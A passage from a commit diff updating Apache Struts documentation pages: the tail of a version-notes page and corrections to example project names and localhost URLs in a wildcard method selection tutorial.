class="external-link" rel="nofollow">Struts 2.3.15 TODO</A></LI>
+ <LI><A href="https://issues.apache.org/jira/issues/?filter=12318399";
class="external-link" rel="nofollow">Struts 2.3.x TODO</A></LI>
+</UL>
+
+
+<H3><A name="VersionNotes2.3.14.3-Otherresources"></A>Other resources</H3>
+
+<UL>
+ <LI><A href="http://www.mail-archive.com/commits@struts.apache.org/";
class="external-link" rel="nofollow">Commit Logs (Struts 1 and Struts
2)</A></LI>
+ <LI><A href="http://svn.apache.org/viewvc/struts/struts2/trunk/";
class="external-link" rel="nofollow">Source Code Repository (includes change
browsing)</A></LI>
+</UL>
+
+ </DIV>
+
+
+ </DIV>
+ </DIV>
+ <DIV class="footer">
+ Generated by
+ <A href="http://www.atlassian.com/confluence/";>Atlassian Confluence</A>
(Version: 3.4.9 Build: 2042 Feb 14, 2011)
+ <A href="http://could.it/autoexport/";>Auto Export Plugin</A> (Version:
1.0.0-dkulp)
+ </DIV>
+ </BODY>
+</HTML>
\ No newline at end of file
Modified:
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
==============================================================================
---
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
(original)
+++
websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html
Wed Jun 5 05:14:58 2013
@@ -123,7 +123,7 @@ under the License.
<DIV class="pagecontent">
<DIV class="wiki-content">
- <DIV class="panelMacro"><TABLE class="infoMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>The
example code for this tutorial, Wildcard_Method_Struts2_Ant or
Wildcard_Method_Struts2_Mvn, is available on Google Code - <A
href="http://code.google.com/p/struts2-examples/downloads/list";
class="external-link"
rel="nofollow">http://code.google.com/p/struts2-examples/downloads/list</A>.
After downloading and unzipping the file, you'll have a folder named
Wildcard_Method_Struts2_Ant (or Wildcard_Method_Struts2_Mvn). In that folder
will be a README.txt file with instructions on now to build and run the example
application.</TD></TR></TABLE></DIV>
+ <DIV class="panelMacro"><TABLE class="infoMacro"><COLGROUP><COL
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG
src="https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif";
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD>The
example code for this tutorial, Wildcard_Method_Struts2_Mvn, is available on
Google Code - <A
href="http://code.google.com/p/struts2-examples/downloads/list";
class="external-link"
rel="nofollow">http://code.google.com/p/struts2-examples/downloads/list</A>.
After downloading and unzipping the file, you'll have a folder named
Wildcard_Method_Struts2_Mvn. In that folder will be a README.txt file with
instructions on now to build and run the example
application.</TD></TR></TABLE></DIV>
<H3><A name="WildcardMethodSelection-Introduction"></A>Introduction</H3>
<P>In this tutorial we'll cover how to configure an action node in the
struts.xml configuration file so that one action node can be used to<BR>
@@ -175,17 +175,17 @@ relate several different Action URLs to
<P>The * is the wildcard character. Any action name values that end in
"Person" will be handled by this action mapping. Whatever value is
before "Person" will be the value used for the method attribute (the
{1} place holder will be replaced with that value). For example this URL:</P>
-<P> <A
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/createPerson.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/createPerson.action</A></P>
+<P> <A
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/createPerson.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/createPerson.action</A></P>
<P>will be be processed by the the above action mapping and method create of
class PersonAction will be called. While this URL</P>
-<P> <A
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/deletePerson.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/deletePerson.action</A></P>
+<P> <A
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/deletePerson.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/deletePerson.action</A></P>
<P>will cause the delete method of class PersonAction to be called.</P>
<P>What happens if we have a URL with nothing in front of Person? For
example:</P>
-<P> <A
href="http://localhost:8080/Wildcard_Method_Struts_2_Mvn/Person.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts_2_Mvn/Person.action</A></P>
+<P> <A
href="http://localhost:8080/Wildcard_Method_Struts2_Mvn/Person.action";
class="external-link"
rel="nofollow">http://localhost:8080/Wildcard_Method_Struts2_Mvn/Person.action</A></P>
<P>If there is no value in front of Person, then the Struts 2 framework will
call the execute method of the class PersonAction.</P>
![https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif"](https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif"](https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/notep_16.gif"](https://cwiki.apache.org/confluence/images/icons/notep_16.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/browse_space.gif"](https://cwiki.apache.org/confluence/images/icons/browse_space.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"](https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"](https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif"](https://cwiki.apache.org/confluence/images/icons/emoticons/check.gif"){kind=link}
![https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif"](https://cwiki.apache.org/confluence/images/icons/emoticons/information.gif"){kind=link}